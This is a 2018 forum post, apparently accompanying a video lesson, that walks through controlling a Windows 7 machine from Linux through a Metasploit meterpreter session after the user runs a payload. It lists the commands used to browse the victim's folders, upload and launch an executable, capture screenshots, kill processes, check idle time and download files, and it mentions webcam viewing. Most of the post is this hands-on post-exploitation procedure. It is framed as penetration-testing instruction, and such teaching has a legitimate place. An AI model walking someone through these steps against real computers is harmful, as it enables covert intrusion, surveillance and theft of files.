Learn About Computers

Teaching about Computers


    24. Lan Pentest Windows 7 Hack Combined Screens Windows 7 & Linux

    Share

    Aof
    Admin

    Posts : 77
    Join date : 2018-03-24

    24. Lan Pentest Windows 7 Hack Combined Screens Windows 7 & Linux

    Post by Aof on Mon May 28, 2018 12:06 am


    24. Lan Pentest Windows 7 Hack Combined Screens Windows 7 & Linux
    ----
    Note: I skipped the first 2 or 3 minutes of the video so that everything
    would be viewable instantly and you wouldn't have to watch an idle 3 minutes of nothing happening.
    1. When the user double left clicks on the Payload that was previously created,
    the payload sends a signal to our machine running Linux, which our Linux System is then able to enter through a backdoor into the Windows 7 system.
    2. sessions -i = is typed in the Linux machine to check for active connections, one is found, but the information fails to display so we wait a few seconds and perform the command again.
    3. sessions -i = is entered again, we see ID is "2" a connection has been made with a Windows pc with an ip of 75.91.168.4 through their out-going port 50393, their information displays the name of the user who clicked on the file, also the Pc's name,
    it connects with the Linux Pc which has an ip address of 75.91.168.3 through the open port 1625 which was previously forwarded.
    4. sessions -i 2 = causes Linux's meterpreter session to connect to the session.
    5. pwd = is entered to find out where the Linux pc meterpreter session is located on the Windows 7 Pc.
    4. idletime = is entered to find out how long the Windows 7 user has been idle for. (idle means not moving mouse or pressing keys, no activity basically.)
    5. cd .. = Goes back a directory, You can navigate using the meterpreter session, but I would recommend navigating directory, by directory, instead of trying to jump from 1 big path to another.
    6. cd .. = Goes back a directory
    7. dir = lists the current home directory of the User, the user's Desktop is visible from here.
    8. cd Desktop = navigates to the User's Desktop.
    9. ls = with the Meterpreter, you can also list items as you would in linux, or you can use the "dir" as you would with Windows Command Prompt.
    One the Desktop, I notice there's a Google Chrome.lnk short-cut link that can be accessed using the shell.
    In another terminal tab, I locate an auto-it script that I previously created before the video.
    10. upload '//root//Desktop//a//thef.exe' "C:\\Users\\user\\Desktop\\thef.exe" = we upload thef.exe from our usb drive's Desktop, to the Windows 7 Pc using the Meterpreter session. Notice how we enclosed the Linux Path with 'these' and the Windows path with "these" that is very important, otherwise it would not work with paths that include spaces in the directories/folders/files names Also Double Slashes is necessary when uploading or downloading files using the Meterpreter.
    11. dir = to view the file that we just uploaded.
    Remember earlier, how we seen the "Google Chrome.lnk" on the user's Desktop?
    12. shell = which changes the meterpreter session into the User's actual command prompt, it's now as if we are sitting infront of the Windows 7 computer using their keyboard.
    13. "Google Chrome.lnk" & timeout /t 12 & thef.exe = Starts Chrome from the short-cut in the present working directory, waits 12 seconds, (just incase their pc is slow), starts our auto-it script thef.exe that we uploaded.
    Even tho our linux terminal gives out an error, it doesn't matter, because it still worked regardless.
    14. exit = type exit one time, and just wait for the command prompt to change into the Meterpreter Session again.
    The Meterpreter Session will return once the Autoit script has finished running.
    15. screenshot = typing screenshot from meterpreter session will save a screenshot of the user's screen to the same folder that we previously started the msfconsole from our rc folder.
    It will also display a path to where you can find the screenshot after it saves.
    16. Using the gui "graphical interface" interface, we navigate and point & click to the rc folder, find the screenshot file that saved, preview it in Linux.
    17. shell = We enter the user's command prompt shell again.
    18. tasklist = lists the running processes of the Windows User.
    "Ctrl+Shift+F" will allow you to search for text within the Linux Terminal.
    19. Chrome.exe = type chrome, or chrome.exe to find the chrome image name process, once you find it kill it by using the next comment.
    20. taskkill /im chrome.exe /f = kills the Chrome Browser Process. (Note: the next time the browser opens, it will try to restore the previous session, keep this in mind, and re-open the process, kill it again if you don't want this to happen, I personally do not care.)
    21. exit = this time take notice how it exits the shell and goes back to the Meterpreter much quicker since we do not have an auto-it script running.
    22. screenshot = takes another screenshot which will be saved in the same place as it did earlier.
    Shell is like being infront of their machine executing commands,
    meterpreter gives the options of uploading, downloading files, and taking screenshots of the user's pc remotely, also as we'll get into later, viewing their webcam if they have an active one installed.
    23. idletime = I check the idletime of the machine again, notice how it's not much different than last time? It's because we ran the auto-it script, and that moved the user's mouse, it only started counting the idletime after the user's mouse quit moving again.
    24. dir = Lists the present working directory files again.
    25. cd sendout = Navigates to "sendout" folder on the user's Desktop.
    26. dir = lists the files of sendout folder.
    27. download videoerror.PNG = Downloads a *.PNG file called, "videoerror.PNG"
    It saves in the same location as our screenshot files saved to earlier.
    When you are ready to close the meterpreter session you can type, "background" if you plan to connect back to it or "exit" if you do not plan to connect to it again, and wish to close the meterpreter session.
    28. sessions -i = You can look at the active, and backgrounded sessions.
    29. sessions -k 1 = You can type sessions -k and an Id number to kill a meterpreter session that you have open from the msf exploit handler.
    30. sessions -i = shows no active sessions once you have killed or exited all open sessions, you are no longer connected to any meterpreter sessions.

      Current date/time is Sat Oct 20, 2018 12:01 am